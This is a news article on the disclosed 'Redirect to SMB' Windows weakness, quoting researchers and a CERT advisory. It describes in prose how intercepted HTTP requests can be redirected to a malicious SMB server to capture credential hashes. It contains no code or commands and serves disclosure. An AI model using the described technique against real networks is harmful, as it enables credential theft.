There is a serious vulnerability in all supported versions of Windows that can allow an attacker who has control of some portion of a victim’s network traffic to steal users’ credentials for valuable services. The bug is related to the way that Windows and other software handles some HTTP requests, and researchers say it affects a wide range of applications, including iTunes and Adobe Flash.
The vulnerability, disclosed Monday by researchers at Cylance, is an extension of research done by Aaron Spangler nearly 20 years ago, and it’s known as Redirect to SMB. This weakness can enable an attacker to force victims to try to authenticate to an attacker-controlled server.
“Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password,” a blog post by Brian Wallace from Cylance says.
“We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server.”
The Redirect to SMB flaw not only affects all of the current versions of Windows, but also Flash, some GitHub clients, some Oracle software and several security applications. Experts at the CERT/CC at Carnegie Mellon University warned that once an attacker is able to grab a victim’s credentials, those passwords can be cracked offline.
“Many software products use HTTP requests for various features such as software update checking. A malicious user can intercept such requests (such as with a MITM proxy) and use HTTP Redirect to redirect the victim a malicious SMB server. If the redirect is a file:// URL and the victim is running Microsoft Windows, Windows will automatically attempt to authenticate to the malicious SMB server by providing the victim’s user credentials to the server. These credentials can then be logged by the malicious server. The credentials are encrypted, but may be “brute-forced” to break the encryption,” the CERT advisory says.
Microsoft has not released a patch for this vulnerability. Researchers say that the attack technique developed by Cylance can make exploitation of the vulnerability much simpler.
“This is a novel attack that can be easily abused to significantly increase the exploitability of Windows client systems communicating on untrusted or compromised networks. While tools like KARMA, Metasploit, and Responder.py depend on the user to make a SMB connection back to the attacker, the Cylance research improves on the attack by abusing how HTTP redirects are handled by callers of the URLMon API,” said HD Moore, chief research officer at Rapid 7.
“The Cylance research shows that instead of waiting for the user to open their browser or manually connect to a network share, an attacker can look for automated HTTP requests sent by background applications and redirect these to file:// URLs, triggering a SMB connection and automatic authentication. Given how many applications a typical laptop or tablet has running in the background, this can drastically speed up SMB capture and relay attacks against Windows-based laptops and tablets connecting to insecure wireless networks.
“On a Windows 8.1 laptop, at least 50 different HTTP connections were made after a restart and within 5 minutes, most of which could be hijacked by a network-local attacker to force SMB authentication to a malicious service. The source of these connections ranged from OEM “update” checks to weather and news applications.”
One potential use for this vulnerability could be as part of a multi-stage attack.
“I would expect this vulnerability to be used as part of a two-stage phishing attack: First try to exploit vulnerabilities, including this one, after getting the user to click a link in an email, and then attempt to do something further by getting the user to “log in” to a fake portal, or downloading software that takes over the machine. In this way, attackers can be moderately effective even if the user doesn’t fall for anything after opening the page,” said Patrick Nielsen, senior security researcher at Kaspersky Lab.
“The SMB authentication payload is interesting mainly to perform further attacks against a single target entity, and particularly if it’s lured out of a user with elevated access, like an Active Directory Operator.”